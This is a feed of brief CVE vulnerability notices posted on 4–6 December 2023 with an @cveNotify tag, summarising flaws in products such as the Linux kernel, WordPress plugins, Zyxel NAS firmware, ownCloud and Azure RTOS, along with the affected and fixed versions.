|
| 2023-12-06 02:29:56 |
🚨 CVE-2023-4459A NULL pointer dereference flaw was found in vmxnet3_rq_cleanup in drivers/net/vmxnet3/vmxnet3_drv.c in the networking sub-component in vmxnet3 in the Linux Kernel. This issue may allow a local attacker with normal user privilege to cause a denial of service due to a missing sanity check during cleanup.🎖@cveNotify |
|
| 2023-12-06 01:59:57 |
🚨 CVE-2023-41735Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Gopi Ramasamy Email posts to subscribers.This issue affects Email posts to subscribers: from n/a through 6.2.🎖@cveNotify |
|
| 2023-12-06 01:59:56 |
🚨 CVE-2023-45050Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Automattic Jetpack – WP Security, Backup, Speed, & Growth allows Stored XSS.This issue affects Jetpack – WP Security, Backup, Speed, & Growth: from n/a through 12.8-a.1.🎖@cveNotify |
|
| 2023-12-06 01:29:57 |
🚨 CVE-2023-28876A Broken Access Control issue in comments to uploaded files in Filerun through Update 20220202 allows attackers to delete comments on files uploaded by other users.🎖@cveNotify |
|
| 2023-12-06 01:29:56 |
🚨 CVE-2023-37927The improper neutralization of special elements in the CGI program of the Zyxel NAS326 firmware version V5.21(AAZF.14)C0 and NAS542 firmware version V5.21(ABAG.11)C0 could allow an authenticated attacker to execute some operating system (OS) commands by sending a crafted URL to a vulnerable device.🎖@cveNotify |
|
| 2023-12-06 01:00:02 |
🚨 CVE-2023-48754Cross-Site Request Forgery (CSRF) vulnerability in Wap Nepal Delete Post Revisions In WordPress allows Cross Site Request Forgery.This issue affects Delete Post Revisions In WordPress: from n/a through 4.6.🎖@cveNotify |
|
| 2023-12-06 01:00:01 |
🚨 CVE-2023-48328Cross-Site Request Forgery (CSRF) vulnerability in Imagely WordPress Gallery Plugin – NextGEN Gallery allows Cross Site Request Forgery.This issue affects WordPress Gallery Plugin – NextGEN Gallery: from n/a through 3.37.🎖@cveNotify |
|
| 2023-12-06 00:59:57 |
🚨 CVE-2023-45609Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in POWR.Io Contact Form – Custom Builder, Payment Form, and More allows Stored XSS.This issue affects Contact Form – Custom Builder, Payment Form, and More: from n/a through 2.1.0.🎖@cveNotify |
|
| 2023-12-06 00:59:56 |
🚨 CVE-2023-37890Missing Authorization vulnerability in WPOmnia KB Support – WordPress Help Desk and Knowledge Base allows Accessing Functionality Not Properly Constrained by ACLs. Users with a role as low as a subscriber can view other customers.This issue affects KB Support – WordPress Help Desk and Knowledge Base: from n/a through 1.5.88.🎖@cveNotify |
|
| 2023-12-06 00:30:24 |
🚨 CVE-2023-24547On affected platforms running Arista MOS, the configuration of a BGP password will cause the password to be logged in clear text that can be revealed in local logs or remote logging servers by authenticated users, as well as appear in clear text in the device’s running config.🎖@cveNotify |
|
| 2023-12-05 23:29:56 |
🚨 CVE-2023-49282msgraph-sdk-php is the Microsoft Graph Library for PHP. The Microsoft Graph PHP SDK published packages which contained test code that enabled the use of the phpInfo() function from any application that could access and execute the file at vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php. The phpInfo function exposes system information. The vulnerability affects the GetPhpInfo.php script of the PHP SDK which contains a call to the phpinfo() function. This vulnerability requires a misconfiguration of the server to be present so it can be exploited. For example, making the PHP application’s /vendor directory web accessible. The combination of the vulnerability and the server misconfiguration would allow an attacker to craft an HTTP request that executes the phpinfo() method. The attacker would then be able to get access to system information like configuration, modules, and environment variables and later on use the compromised secrets to access additional data. This problem has been patched in versions 1.109.1 and 2.0.0-RC5. If an immediate deployment with the updated vendor package is not available, you can perform the following temporary workarounds: delete the `vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php` file, remove access to the `/vendor` directory, or disable the phpinfo function.🎖@cveNotify |
|
| 2023-12-05 22:30:02 |
🚨 CVE-2023-47848Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tainacan.Org Tainacan allows Reflected XSS.This issue affects Tainacan: from n/a through 0.20.4.🎖@cveNotify |
|
| 2023-12-05 22:29:57 |
🚨 CVE-2023-37868Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Leap13 Premium Addons PRO.This issue affects Premium Addons PRO: from n/a through 2.9.0.🎖@cveNotify |
|
| 2023-12-05 22:29:56 |
🚨 CVE-2023-39417IN THE EXTENSION SCRIPT, a SQL Injection vulnerability was found in PostgreSQL if it uses @extowner@, @extschema@, or @extschema:...@ inside a quoting construct (dollar quoting, '', or ""). If an administrator has installed files of a vulnerable, trusted, non-bundled extension, an attacker with database-level CREATE privilege can execute arbitrary code as the bootstrap superuser.🎖@cveNotify |
|
| 2023-12-05 21:30:02 |
🚨 CVE-2023-5970Improper authentication in the SMA100 SSL-VPN virtual office portal allows a remote authenticated attacker to create an identical external domain user using accent characters, resulting in an MFA bypass.🎖@cveNotify |
|
| 2023-12-05 21:30:01 |
🚨 CVE-2023-49297PyDrive2 is a wrapper library of google-api-python-client that simplifies many common Google Drive API V2 tasks. Unsafe YAML deserilization will result in arbitrary code execution. A maliciously crafted YAML file can cause arbitrary code execution if PyDrive2 is run in the same directory as it, or if it is loaded in via `LoadSettingsFile`. This is a deserilization attack that will affect any user who initializes GoogleAuth from this package while a malicious yaml file is present in the same directory. This vulnerability does not require the file to be directly loaded through the code, only present. This issue has been addressed in commit `c57355dc` which is included in release version `1.16.2`. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-05 21:29:57 |
🚨 CVE-2023-46736EspoCRM is an Open Source CRM (Customer Relationship Management) software. In affected versions there is Server-Side Request Forgery (SSRF) vulnerability via the upload image from url api. Users who have access to `the /Attachment/fromImageUrl` endpoint can specify URL to point to an internal host. Even though there is check for content type, it can be bypassed by redirects in some cases. This SSRF can be leveraged to disclose internal information (in some cases), target internal hosts and bypass firewalls. This vulnerability has been addressed in commit `c536cee63` which is included in release version 8.0.5. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-05 21:29:56 |
🚨 CVE-2015-8751Integer overflow in the jas_matrix_create function in JasPer allows context-dependent attackers to have unspecified impact via a crafted JPEG 2000 image, related to integer multiplication for memory allocation.🎖@cveNotify |
|
| 2023-12-05 20:59:57 |
🚨 CVE-2023-36685Cross-Site Request Forgery (CSRF) vulnerability in Brainstorm Force US LLC CartFlows Pro allows Cross Site Request Forgery.This issue affects CartFlows Pro: from n/a through 1.11.12.🎖@cveNotify |
|
| 2023-12-05 20:59:56 |
🚨 CVE-2023-48737Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PT Trijaya Digital Grup TriPay Payment Gateway allows Stored XSS.This issue affects TriPay Payment Gateway: from n/a through 3.2.7.🎖@cveNotify |
|
| 2023-12-05 20:30:09 |
🚨 CVE-2023-44298Dell PowerEdge platforms 16G Intel E5 BIOS and Dell Precision BIOS, version 1.4.4, contain active debug code security vulnerability. An unauthenticated physical attacker could potentially exploit this vulnerability, leading to information tampering, code execution, denial of service.🎖@cveNotify |
|
| 2023-12-05 20:30:02 |
🚨 CVE-2023-48914Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/archives/add.🎖@cveNotify |
|
| 2023-12-05 20:30:01 |
🚨 CVE-2023-48913Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/archives/delete.🎖@cveNotify |
|
| 2023-12-05 20:29:57 |
🚨 CVE-2023-48742Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LicenseManager License Manager for WooCommerce license-manager-for-woocommerce allows SQL Injection.This issue affects License Manager for WooCommerce: from n/a through 2.2.10.🎖@cveNotify |
|
| 2023-12-05 20:29:56 |
🚨 CVE-2023-47505Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Elementor.Com Elementor allows Cross-Site Scripting (XSS).This issue affects Elementor: from n/a through 3.16.4.🎖@cveNotify |
|
| 2023-12-05 20:00:01 |
🚨 CVE-2023-47645Cross-Site Request Forgery (CSRF) vulnerability in RegistrationMagic RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login allows Cross Site Request Forgery.This issue affects RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login: from n/a through 5.2.2.6.🎖@cveNotify |
|
| 2023-12-05 19:59:57 |
🚨 CVE-2023-34030Cross-Site Request Forgery (CSRF) vulnerability in Really Simple Plugins Complianz, Really Simple Plugins Complianz Premium allows Cross-Site Request Forgery.This issue affects Complianz: from n/a through 6.4.5; Complianz Premium: from n/a through 6.4.7.🎖@cveNotify |
|
| 2023-12-05 19:59:56 |
🚨 CVE-2023-48336Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in cybernetikz Easy Social Icons allows Stored XSS.This issue affects Easy Social Icons: from n/a through 3.2.4.🎖@cveNotify |
|
| 2023-12-05 19:29:56 |
🚨 CVE-2023-0159The Extensive VC Addons for WPBakery page builder WordPress plugin before 1.9.1 does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.🎖@cveNotify |
|
| 2023-12-05 19:00:03 |
🚨 CVE-2023-47851Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Akhtarujjaman Shuvo Bootstrap Shortcodes Ultimate allows Stored XSS.This issue affects Bootstrap Shortcodes Ultimate: from n/a through 4.3.1.🎖@cveNotify |
|
| 2023-12-05 19:00:02 |
🚨 CVE-2023-37927The improper neutralization of special elements in the CGI program of the Zyxel NAS326 firmware version V5.21(AAZF.14)C0 and NAS542 firmware version V5.21(ABAG.11)C0 could allow an authenticated attacker to execute some operating system (OS) commands by sending a crafted URL to a vulnerable device.🎖@cveNotify |
|
| 2023-12-05 18:59:57 |
🚨 CVE-2023-35137An improper authentication vulnerability in the authentication module of the Zyxel NAS326 firmware version V5.21(AAZF.14)C0 and NAS542 firmware version V5.21(ABAG.11)C0 could allow an unauthenticated attacker to obtain system information by sending a crafted URL to a vulnerable device.🎖@cveNotify |
|
| 2023-12-05 18:59:56 |
🚨 CVE-2023-4667The web interface of the PAC Device allows the device administrator user profile to store malicious scripts in some fields. The stored malicious script is then executed when the GUI is opened by any users of the webserver administration interface. The root cause of the vulnerability is inadequate input validation and output encoding in the web administration interface component of the firmware.This could lead to unauthorized access and data leakage🎖@cveNotify |
|
| 2023-12-05 18:30:13 |
🚨 CVE-2023-45841Multiple data integrity vulnerabilities exist in the package hash checking functionality of Buildroot 2023.08.1 and Buildroot dev commit 622698d7847. A specially crafted man-in-the-middle attack can lead to arbitrary command execution in the builder.This vulnerability is related to the `versal-firmware` package.🎖@cveNotify |
|
| 2023-12-05 18:30:12 |
🚨 CVE-2023-45838Multiple data integrity vulnerabilities exist in the package hash checking functionality of Buildroot 2023.08.1 and Buildroot dev commit 622698d7847. A specially crafted man-in-the-middle attack can lead to arbitrary command execution in the builder.This vulnerability is related to the `aufs` package.🎖@cveNotify |
|
| 2023-12-05 18:30:11 |
🚨 CVE-2023-43628An integer overflow vulnerability exists in the NTRIP Stream Parsing functionality of GPSd 3.25.1~dev. A specially crafted network packet can lead to memory corruption. An attacker can send a malicious packet to trigger this vulnerability.🎖@cveNotify |
|
| 2023-12-05 18:30:07 |
🚨 CVE-2022-45135Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Cocoon.This issue affects Apache Cocoon: from 2.2.0 before 2.3.0.Users are recommended to upgrade to version 2.3.0, which fixes the issue.🎖@cveNotify |
|
| 2023-12-05 18:30:06 |
🚨 CVE-2023-49076Customer-data-framework allows management of customer data within Pimcore. There are no tokens or headers to prevent CSRF attacks from occurring, therefore an attacker could abuse this vulnerability to create new customers. This issue has been patched in version 4.0.5.🎖@cveNotify |
|
| 2023-12-05 18:30:02 |
🚨 CVE-2023-5274Improper Input Validation vulnerability in simulation function of GX Works2 allows an attacker to cause a denial-of-service (DoS) condition on the function by sending specially crafted packets. However, the attacker would need to send the packets from within the same personal computer where the function is running.🎖@cveNotify |
|
| 2023-12-05 18:30:01 |
🚨 CVE-2023-47463Insecure Permissions vulnerability in GL.iNet AX1800 version 4.0.0 before 4.5.0 allows a remote attacker to execute arbitrary code via a crafted script to the gl_nas_sys authentication function.🎖@cveNotify |
|
| 2023-12-05 18:29:57 |
🚨 CVE-2023-5247Malicious Code Execution Vulnerability due to External Control of File Name or Path in multiple Mitsubishi Electric FA Engineering Software Products allows a malicious attacker to execute a malicious code by having legitimate users open a specially crafted project file, which could result in information disclosure, tampering and deletion, or a denial-of-service (DoS) condition.🎖@cveNotify |
|
| 2023-12-05 18:29:56 |
🚨 CVE-2023-37928A post-authentication command injection vulnerability in the WSGI server of the Zyxel NAS326 firmware version V5.21(AAZF.14)C0 and NAS542 firmware version V5.21(ABAG.11)C0 could allow an authenticated attacker to execute some operating system (OS) commands by sending a crafted URL to a vulnerable device.🎖@cveNotify |
|
| 2023-12-05 17:00:06 |
🚨 CVE-2023-48881A stored cross-site scripting (XSS) vulnerability in EyouCMS v1.6.4-UTF8-SP1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Field Title field at /login.php?m=admin&c=Field&a=arctype_add&_ajax=1&lang=cn.🎖@cveNotify |
|
| 2023-12-05 17:00:05 |
🚨 CVE-2023-48880A stored cross-site scripting (XSS) vulnerability in EyouCMS v1.6.4-UTF8-SP1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Menu Name field at /login.php?m=admin&c=Index&a=changeTableVal&_ajax=1&lang=cn.🎖@cveNotify |
|
| 2023-12-05 16:30:21 |
🚨 CVE-2023-44297Dell PowerEdge platforms 16G Intel E5 BIOS and Dell Precision BIOS, version 1.4.4, contain active debug code security vulnerability. An unauthenticated physical attacker could potentially exploit this vulnerability, leading to information disclosure, information tampering, code execution, denial of service.🎖@cveNotify |
|
| 2023-12-05 16:30:20 |
🚨 CVE-2023-49652Incorrect permission checks in Jenkins Google Compute Engine Plugin 4.550.vb_327fca_3db_11 and earlier allow attackers with global Item/Configure permission (while lacking Item/Configure permission on any particular job) to enumerate system-scoped credentials IDs of credentials stored in Jenkins and to connect to Google Cloud Platform using attacker-specified credentials IDs obtained through another method, to obtain information about existing projects. This fix has been backported to 4.3.17.1.🎖@cveNotify |
|
| 2023-12-05 16:00:15 |
🚨 CVE-2023-6378A serialization vulnerability in logback receiver component part of logback version 1.4.11 allows an attacker to mount a Denial-Of-Service attack by sending poisoned data.🎖@cveNotify |
|
| 2023-12-05 16:00:14 |
🚨 CVE-2023-6348Type Confusion in Spellcheck in Google Chrome prior to 119.0.6045.199 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-12-05 15:30:43 |
🚨 CVE-2023-49397JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/category/updateStatus.🎖@cveNotify |
|
| 2023-12-05 15:30:42 |
🚨 CVE-2023-49396JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/category/save.🎖@cveNotify |
|
| 2023-12-05 15:30:41 |
🚨 CVE-2023-49395JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/category/update.🎖@cveNotify |
|
| 2023-12-05 15:30:40 |
🚨 CVE-2023-49383JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/tag/save.🎖@cveNotify |
|
| 2023-12-05 15:30:39 |
🚨 CVE-2023-49382JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/div/delete.🎖@cveNotify |
|
| 2023-12-05 15:30:35 |
🚨 CVE-2023-49380JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/friend_link/delete.🎖@cveNotify |
|
| 2023-12-05 15:30:34 |
🚨 CVE-2023-49377JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/tag/update.🎖@cveNotify |
|
| 2023-12-05 15:30:30 |
🚨 CVE-2023-49375JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/friend_link/update.🎖@cveNotify |
|
| 2023-12-05 15:30:29 |
🚨 CVE-2023-49372JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/slide/save.🎖@cveNotify |
|
| 2023-12-05 15:30:25 |
🚨 CVE-2023-42917A memory corruption vulnerability was addressed with improved locking. This issue is fixed in iOS 17.1.2 and iPadOS 17.1.2, macOS Sonoma 14.1.2, Safari 17.1.2. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1.🎖@cveNotify |
|
| 2023-12-05 15:30:24 |
🚨 CVE-2023-6070A server-side request forgery vulnerability in ESM prior to version 11.6.8 allows a low privileged authenticated user to upload arbitrary content, potentially altering configuration. This is possible through the certificate validation functionality where the API accepts uploaded content and doesn't parse for invalid data🎖@cveNotify |
|
| 2023-12-05 15:30:23 |
🚨 CVE-2023-29066The FACSChorus software does not properly assign data access privileges for operating system user accounts. A non-administrative OS account can modify information stored in the local application data folders.🎖@cveNotify |
|
| 2023-12-05 14:30:23 |
🚨 CVE-2023-49674A missing permission check in Jenkins NeuVector Vulnerability Scanner Plugin 1.22 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified hostname and port using attacker-specified username and password.🎖@cveNotify |
|
| 2023-12-05 14:30:22 |
🚨 CVE-2023-46887In Dreamer CMS before 4.0.1, the backend attachment management office has an Arbitrary File Download vulnerability.🎖@cveNotify |
|
| 2023-12-05 13:30:00 |
🚨 CVE-2023-49656Jenkins MATLAB Plugin 2.11.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.🎖@cveNotify |
|
| 2023-12-05 13:29:59 |
🚨 CVE-2023-49654Missing permission checks in Jenkins MATLAB Plugin 2.11.0 and earlier allow attackers to have Jenkins parse an XML file from the Jenkins controller file system.🎖@cveNotify |
|
| 2023-12-05 13:29:58 |
🚨 CVE-2023-5178A use-after-free vulnerability was found in drivers/nvme/target/tcp.c` in `nvmet_tcp_free_crypto` due to a logical bug in the NVMe-oF/TCP subsystem in the Linux kernel. This issue may allow a malicious local privileged user to cause a use-after-free and double-free problem, which may permit remote code execution or lead to local privilege escalation problem.🎖@cveNotify |
|
| 2023-12-05 13:00:22 |
🚨 CVE-2023-24294Zumtobel Netlink CCD Onboard v3.74 - Firmware v3.80 was discovered to contain a buffer overflow via the component NetlinkWeb::Information::SetDeviceIdentification.🎖@cveNotify |
|
| 2023-12-05 13:00:21 |
🚨 CVE-2023-23324Zumtobel Netlink CCD Onboard 3.74 - Firmware 3.80 was discovered to contain hardcoded credentials for the Administrator account.🎖@cveNotify |
|
| 2023-12-05 12:30:29 |
🚨 CVE-2023-45840Multiple data integrity vulnerabilities exist in the package hash checking functionality of Buildroot 2023.08.1 and Buildroot dev commit 622698d7847. A specially crafted man-in-the-middle attack can lead to arbitrary command execution in the builder.This vulnerability is related to the `riscv64-elf-toolchain` package.🎖@cveNotify |
|
| 2023-12-05 12:30:22 |
🚨 CVE-2023-43628An integer overflow vulnerability exists in the NTRIP Stream Parsing functionality of GPSd 3.25.1~dev. A specially crafted network packet can lead to memory corruption. An attacker can send a malicious packet to trigger this vulnerability.🎖@cveNotify |
|
| 2023-12-05 12:30:21 |
🚨 CVE-2023-4912An issue has been discovered in GitLab EE affecting all versions starting from 10.5 before 16.4.3, all versions starting from 16.5 before 16.5.3, all versions starting from 16.6 before 16.6.1. It was possible for an attacker to cause a client-side denial of service using malicious crafted mermaid diagram input.🎖@cveNotify |
|
| 2023-12-05 10:30:18 |
🚨 CVE-2023-46589Improper Input Validation vulnerability in Apache Tomcat.Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82 and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. A trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy.Users are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue.🎖@cveNotify |
|
| 2023-12-05 10:30:17 |
🚨 CVE-2021-39236In Apache Ozone before 1.2.0, Authenticated users with valid Ozone S3 credentials can create specific OM requests, impersonating any other user.🎖@cveNotify |
|
| 2023-12-05 08:30:24 |
🚨 CVE-2023-5188The MMS Interpreter of WagoAppRTU in versions below 1.4.6.0 which is used by the WAGO Telecontrol Configurator is vulnerable to malformed packets. An remote unauthenticated attacker could send specifically crafted packets that lead to a denial-of-service condition until restart of the affected device.🎖@cveNotify |
|
| 2023-12-05 08:30:23 |
🚨 CVE-2023-49070Pre-auth RCE in Apache Ofbiz 18.12.09.It's due to XML-RPC no longer maintained still present.This issue affects Apache OFBiz: before 18.12.10. Users are recommended to upgrade to version 18.12.10🎖@cveNotify |
|
| 2023-12-05 07:30:02 |
🚨 CVE-2023-6201Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Univera Computer System Panorama allows Command Injection.This issue affects Panorama: before 8.0.🎖@cveNotify |
|
| 2023-12-05 07:29:57 |
🚨 CVE-2023-6150Improper Privilege Management vulnerability in ESKOM Computer e-municipality module allows Collect Data as Provided by Users.This issue affects e-municipality module: before v.105.🎖@cveNotify |
|
| 2023-12-05 07:29:56 |
🚨 CVE-2023-4662Execution with Unnecessary Privileges vulnerability in Saphira Saphira Connect allows Remote Code Inclusion.This issue affects Saphira Connect: before 9.🎖@cveNotify |
|
| 2023-12-05 06:30:02 |
🚨 CVE-2023-44295Dell PowerScale OneFS versions 8.2.2.x through 9.6.0.x contains an improper control of a resource through its lifetime vulnerability. A low privilege attacker could potentially exploit this vulnerability, leading to loss of information, and information disclosure.🎖@cveNotify |
|
| 2023-12-05 06:29:57 |
🚨 CVE-2023-37572Softing OPC Suite version 5.25 and before has Incorrect Access Control, allows attackers to obtain sensitive information via weak permissions in OSF_discovery service.🎖@cveNotify |
|
| 2023-12-05 06:29:56 |
🚨 CVE-2023-33202Bouncy Castle for Java before 1.73 contains a potential Denial of Service (DoS) issue within the Bouncy Castle org.bouncycastle.openssl.PEMParser class. This class parses OpenSSL PEM encoded streams containing X.509 certificates, PKCS8 encoded keys, and PKCS7 objects. Parsing a file that has crafted ASN.1 data through the PEMParser causes an OutOfMemoryError, which can enable a denial of service attack. (For users of the FIPS Java API: BC-FJA 1.0.2.3 and earlier are affected; BC-FJA 1.0.2.4 is fixed.)🎖@cveNotify |
|
| 2023-12-05 04:29:56 |
🚨 CVE-2023-47304An issue was discovered in Vonage Box Telephone Adapter VDV23 version VDV21-3.2.11-0.5.1, allows local attackers to bypass UART authentication controls and read/write arbitrary values to the memory of the device.🎖@cveNotify |
|
| 2023-12-05 03:30:09 |
🚨 CVE-2023-28587Memory corruption in BT controller while parsing debug commands with specific sub-opcodes at HCI interface level.🎖@cveNotify |
|
| 2023-12-05 03:30:03 |
🚨 CVE-2023-28586Information disclosure when the trusted application metadata symbol addresses are accessed while loading an ELF in TEE.🎖@cveNotify |
|
| 2023-12-05 03:30:02 |
🚨 CVE-2023-28579Memory Corruption in WLAN Host while deserializing the input PMK bytes without checking the input PMK length.🎖@cveNotify |
|
| 2023-12-05 03:30:01 |
🚨 CVE-2023-28551Memory corruption in UTILS when modem processes memory specific Diag commands having arbitrary address values as input arguments.🎖@cveNotify |
|
| 2023-12-05 03:29:57 |
🚨 CVE-2023-28546Memory Corruption in SPS Application while exporting public key in sorter TA.🎖@cveNotify |
|
| 2023-12-05 03:29:56 |
🚨 CVE-2023-21634Memory Corruption in Radio Interface Layer while sending an SMS or writing an SMS to SIM.🎖@cveNotify |
|
| 2023-12-05 02:30:02 |
🚨 CVE-2023-48331Cross-Site Request Forgery (CSRF) vulnerability in Stormhill Media MyBookTable Bookstore by Stormhill Media allows Cross Site Request Forgery.This issue affects MyBookTable Bookstore by Stormhill Media: from n/a through 3.3.4.🎖@cveNotify |
|
| 2023-12-05 02:29:57 |
🚨 CVE-2023-48284Cross-Site Request Forgery (CSRF) vulnerability in WebToffee Decorator – WooCommerce Email Customizer allows Cross Site Request Forgery.This issue affects Decorator – WooCommerce Email Customizer: from n/a through 1.2.7.🎖@cveNotify |
|
| 2023-12-05 02:29:56 |
🚨 CVE-2023-49083cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Calling `load_pem_pkcs7_certificates` or `load_der_pkcs7_certificates` could lead to a NULL-pointer dereference and segfault. Exploitation of this vulnerability poses a serious risk of Denial of Service (DoS) for any application attempting to deserialize a PKCS7 blob/certificate. The consequences extend to potential disruptions in system availability and stability. This vulnerability has been patched in version 41.0.6.🎖@cveNotify |
|
| 2023-12-05 02:00:09 |
🚨 CVE-2023-3741An OS Command injection vulnerability in NEC Platforms DT900 and DT900S Series all versions allows an attacker to execute any command on the device.🎖@cveNotify |
|
| 2023-12-05 02:00:03 |
🚨 CVE-2023-49694A low-privileged OS user with access to a Windows host where NETGEAR ProSAFE Network Management System is installed can create arbitrary JSP files in a Tomcat web application directory. The user can then execute the JSP files under the security context of SYSTEM.🎖@cveNotify |
|
| 2023-12-05 02:00:02 |
🚨 CVE-2022-42540Elevation of privilege🎖@cveNotify |
|
| 2023-12-05 01:59:57 |
🚨 CVE-2022-42538Elevation of privilege🎖@cveNotify |
|
| 2023-12-05 01:59:56 |
🚨 CVE-2023-49082aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Improper validation makes it possible for an attacker to modify the HTTP request (e.g. insert a new header) or even create a new HTTP request if the attacker controls the HTTP method. The vulnerability occurs only if the attacker can control the HTTP method (GET, POST etc.) of the request. If the attacker can control the HTTP version of the request it will be able to modify the request (request smuggling). This issue has been patched in version 3.9.0.🎖@cveNotify |
|
| 2023-12-05 01:30:09 |
🚨 CVE-2023-48697Azure RTOS USBX is a USB host, device, and on-the-go (OTG) embedded stack, that is fully integrated with Azure RTOS ThreadX. An attacker can cause remote code execution due to memory buffer and pointer vulnerabilities in Azure RTOS USBX. The affected components include functions/processes in pictbridge and host class, related to PIMA, storage, CDC ACM, ECM, audio, hub in RTOS v6.2.1 and below. The fixes have been included in USBX release 6.3.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-05 01:30:03 |
🚨 CVE-2023-48696Azure RTOS USBX is a USB host, device, and on-the-go (OTG) embedded stack, that is fully integrated with Azure RTOS ThreadX. An attacker can cause remote code execution due to expired pointer dereference vulnerabilities in Azure RTOS USBX. The affected components include components in host class, related to CDC ACM in RTOS v6.2.1 and below. The fixes have been included in USBX release 6.3.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-05 01:30:02 |
🚨 CVE-2023-48693Azure RTOS ThreadX is an advanced real-time operating system (RTOS) designed specifically for deeply embedded applications. An attacker can cause arbitrary read and write due to vulnerability in parameter checking mechanism in Azure RTOS ThreadX, which may lead to privilege escalation. The affected components include RTOS ThreadX v6.2.1 and below. The fixes have been included in ThreadX release 6.3.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-05 01:30:01 |
🚨 CVE-2023-48692Azure RTOS NetX Duo is a TCP/IP network stack designed specifically for deeply embedded real-time and IoT applications. An attacker can cause remote code execution due to memory overflow vulnerabilities in Azure RTOS NETX Duo. The affected components include processes/functions related to icmp, tcp, snmp, dhcp, nat and ftp in RTOS v6.2.1 and below. The fixes have been included in NetX Duo release 6.3.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-05 01:29:57 |
🚨 CVE-2023-48316Azure RTOS NetX Duo is a TCP/IP network stack designed specifically for deeply embedded real-time and IoT applications. An attacker can cause remote code execution due to memory overflow vulnerabilities in Azure RTOS NETX Duo. The affected components include processes/functions related to snmp, smtp, ftp and dtls in RTOS v6.2.1 and below. The fixes have been included in NetX Duo release 6.3.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-05 01:29:56 |
🚨 CVE-2023-47272Roundcube 1.5.x before 1.5.6 and 1.6.x before 1.6.5 allows XSS via a Content-Type or Content-Disposition header (used for attachment preview or download).🎖@cveNotify |
|
| 2023-12-05 00:30:15 |
🚨 CVE-2023-21215There is elevation of privilege.🎖@cveNotify |
|
| 2023-12-05 00:30:09 |
🚨 CVE-2023-21166There is elevation of privilege.🎖@cveNotify |
|
| 2023-12-05 00:30:08 |
🚨 CVE-2023-21162There is elevation of privilege.🎖@cveNotify |
|
| 2023-12-05 00:30:07 |
🚨 CVE-2023-49103An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system. Therefore, even if ownCloud is not running in a containerized environment, this vulnerability should still be a cause for concern. Note that Docker containers from before February 2023 are not vulnerable to the credential disclosure.🎖@cveNotify |
|
| 2023-12-04 23:30:14 |
🚨 CVE-2023-24049An issue was discovered on Connectize AC21000 G6 641.139.1.1256 allows attackers to gain escalated privileges on the device via poor credential management.🎖@cveNotify |
|
| 2023-12-04 23:30:13 |
